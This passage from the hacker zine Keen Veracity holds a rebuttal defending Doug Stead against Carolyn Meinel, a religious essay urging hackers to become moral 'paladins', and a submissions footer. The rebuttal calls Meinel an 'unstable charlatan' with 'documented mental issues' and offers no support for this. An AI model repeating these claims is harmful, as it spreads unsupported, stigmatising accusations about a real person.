never heard of Stead. And Stead is not >listed anywhere on their web site. Stead is listed on the website, but there is no mention of a Phil Ortega on the website. Meinel's claims are so inaccurate one must wonder whether she even looked at the sites being discussed or has fabricated these claims as a result of her documented mental issues. >I have asked around the computer forensics community. They have never >heard of Stead. I asked Stead for his credentials in forensics. He first >gave out the name of some university, then backpedaled and said he was >not a forensics person. Doug Stead never claimed to be a member of the forensics community. He has provided support to bring RCMPs to training and confrerences. Doug Stead has also spoken at some of these confrences. Doug Stead is the President of EAP (Entrapaunres against Pedophilia) Doug Stead is the Owner of Tri-M Systems. Others members of the board at the time are involved in the forensics community. This includes Don Withers http://www.google.com/search?hl=en&safe=off&q=%22Don+Withers%22+%2BForensics and Al Wiinikainen http://www.hightechcrimecops.org/advisory.htm http://www.goldcrew.com/ >Are any of those people at AntiChildPorn for real? Will they someday >turn up on our Busted! <../crime/busted.shtml> page? We hope SOMETHING >will happen to set an example -- adults shouldn't recruit children to >sift through porn sites for them. Carolyn Meinel for real? Will she someday turn up on numerous web pages exposing her as an unstable charlatan? She already has. In the War against child pornography and child abuse by pedophiles, the enemy of my enemy is my friend. Conversely, my enemies are friends of my enemy. [Love's Freedom]=======================================================[Raschid] "Do not conform any longer to the pattern of this world, but be transformed by the renewing of your mind." -Romans 12:2 In the last issue of Keen Veracity (Issue 10) I discussed the purpose of Warzael Zarcae, and the need for a new class of hacker: the paladin. I have also discussed in general terms what type of individual this new rank would take, in lectures delivered and in personal discussions. Zarcae's ideas have always been clear on what sort of person this paladin should be: wise in knowledge, gentle in carrying out his understanding, and above all, joyous with his zeal for high living. Legalism (the idea of slavishly following a set of rules) is the antithesis to the right state of mind for the hacker paladin. Instead, we should so order our lives that rules aren't necessary; doing the good is as natural to us as breathing. Obedience to the higher moral law ought to be a joy; not because we expect to receive anything from it, but because we enjoy the action itself. Consider: When a man is in love with someone, he doesn't perform actions simply to garner favor. If he did that, then his relationship wouldn't be worth much (or last long; people aren't as stupid as they appear). We do actions in love because it is a joy and a blessing for us to do so. In the same way, our duties as Zarcadians should be carried in out full happiness, come what may. Even if our endeavors lead to our persecution and capture by government authorities, be of good cheer! You're serving a higher cause; history will judge you not as criminals, but as the leaders of the moral revolution in the underground. Eventually, even authorities will come to realize that not all of us are evil, and out for destruction. We have this treasure in jars of clay to show that this all-surpassing power is from God and not from us. We are hard pressed on every side, but not crushed; perplexed, but not in despair; persecuted, but not abandoned; struck down, but not destroyed.' -Corinthians (I) 4:7-9 Daily let us should lift our hands in benediction and happiness that it has fallen to our shoulders to work this marvelous revolution in the underground. We are the ones shouting in joy, waving our arms at our brethren to join us, sounding the call to battle against the Dark. We, weak vessels of mud and filth, have been given this beautiful chance to wipe clean, and by our cleanliness, to become an example to the underground of what true goodness is. Let us bless daily all those who have sneered to our faces, members who've apostatized our ethics, and everyone who has ever read our papers, heard a Zarcadian lecture, and mocked heartily our beliefs. It is these people who most need to hear a message of hope for the underground; we are no longer living in bondage, but singing in the full daylight, songs of joy, and unending praise. What type of man is this new hacker paladin? The best example is hundreds of years old, in a old, old story: A knight there was, and he a worthy man, Who, from the moment that he first began To ride about the world, loved chivalry, Truth, honor, freedom and all courtesy". -Geoffrey Chaucer, "The Canterbury Tales" Our joy should be in doing right; we should be so pre-occupied with honoring others that we have no time for our own avarice, and misdeeds. "Finally brothers, whatever is true, whatever is noble, whatever is right, whatever is pure, whatever is lovely, whatever is admirable-if anything is excellent and praiseworthy- think about such things." -Philippians 4:8 Our minds ought to be occupied be higher things; with love rather than consuming hatred; justice for the poor rather than concern over our own finances, and with how much *we* are making. Think about it: in the underground as it stands, how many of us are devoured by our lusts for vice, and our love of perversion? Most hackers I know would rather download porn than music, and would rather curse one another than say anything worthwhile. We complain that the world has no respect for us; what have we done to deserve it? We claim in magazines that we're the ^Ñelite', that we represent a new order to things. From this humble writer's perspective, it only seems we're a new wrinkle on an old, old face. Other than malicious pranks, we as a people haven't made any sort of significant impact on the world, other than to be a handy boogeyman for government military types and law enforcement to justify increasing their budgets with. If you're a hacker currently engaging in dark enterprises, consider! The consequences of your action don't just extend to yourself (getting caught) but extend to every hacker in the world. For every one of us engaged in evil, the honorable name of "hacker" grows a little dimmer every time. Already the word "virtue" to the underground as a whole is a flickering candle, soon to be gutted. Do you want it said that you were the final puff of wind that blew it out? Turn your ways. Accept your duty. Learn to do good, and combat evil. For every hacker engaged in the good, our name grows a little brighter, and the dream of an underground concerned with worthwhile, honorable endeavors draws a bit nearer. Many government officials will not understand you, should you turn your ways. Good or evil, they will see only a computer hacker, born and bred to spread chaos. As I said in "Hacker Paladins"; though they will persecute you, do not strike maliciously at sworn agents of justice. We fight, them and us, on the same side: to protect the masses, and guard them from those who would exploit and perform savagery. The proper attitude for a paladin to take regarding persecution is found in the poetry of Richard Lovelace: "Stone walls do not a prison make Nor iron bars a cage; Minds quiet and innocent take That for a hermitage; If I have freedom in my love And in my soul am free Angels alone, that soar above, Enjoy such liberty.' -"To Althea, In Prison" We are free in many ways; free to love whomever we choose, free to follow our faith; free to hope in a better world to come. Yet there are so many ways in which we are not free: we are not free from our lusts, our sick desires, and our despair in our own inherent dark hearts. How can we shun this bane, and learn to walk as we ought? By being servants of the High, rather than the lords of destruction that the world sees as us. Better a servant in Heaven than a lord of Hell. What type of love should paladins practice? To answer this, we turn to examining the Romantic-era Christian mystic Robert Blake: "Love seeketh not itself to please Nor for itself hath any care, But for another gives its ease, And builds a Heaven in Hell's despair.' So sung a little clod of clay, Trodden with the cattle's feet, But a pebble of the brook Warbled out these meters meet: Love seeketh only self to please To bind another to its delight Joys in another loss of ease, And builds a Hell in Heaven's despite.'" The two philosophies contained in the poem (the clay's self-sacrifice, humility and compassion contrasted with the pebble's hatred, sadism, selfishness and pride) are the two forces battling in the underground. Most hackers become such not out of any joy they gain in technical knowledge, but craving the respect they feel they'll get from wreaking havoc on innocents. Even when confronted with the damage they cause, most darksider hackers look at you blankly, and ask in bewilderment what this has to do with them, and can you please step away from their keyboard? This is stupidity, and a total lack of empathy. Many others enjoy using their skills to deliberately hurt people; not for a political cause, not for any real reason, but simply because they can. It is against this element that a small force of virtuous honorable men will arise ni every generation, in every sub-culture, to combat, and withstand. It is the clay's philosophy that Zarcadians must always strive to keep close, and the pebble's philosophy which we must forever fight again. Until next we meet, brothers and sisters, Godbless. -Raschid *Founder of Warzael Zarcae **You can contact Raschid at cogitoesum@yahoo.com; read Zarcae's works at www.hackedarchives.com, or come join us in #zarcae on undernet on IRC!** -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. You can be a member of something else! Nobody is perfect! If you have a idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudice in any way shape or form, so even a AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyones stuff maybe published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is a equal opportunity destroyer. -------------------------------------------------------------------------------- All submissions to: submit@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions MUD: Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding -------------------------------------------------------------------------------- O F T E N I M I T A T E D N E V E R D U P L I C A T E D -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____| \_____/ \_____/ z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": www.legions.org z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* -------------------------------------------------------------------------------- All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2001 legions.org, all rights reserved. --------------------------------------------------------------------------------